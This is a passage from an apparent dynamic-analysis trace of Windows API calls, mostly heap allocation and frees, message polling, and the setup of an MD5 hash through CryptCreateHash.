RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0175.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0175.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0175.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0175.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.062] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0175.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.062] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0175.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0175.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0175.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.062] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.063] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0175.063] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.063] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0175.063] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0175.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0175.063] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0175.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0175.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0175.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0175.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0175.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0175.064] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0175.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0175.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0175.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0175.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0175.065] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0175.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0175.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0175.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0175.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0175.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0175.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0175.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0175.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0175.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0175.144] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0175.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0175.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0175.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0175.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0175.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0175.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0175.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0175.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dc8 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0175.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0175.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54df8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0175.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, 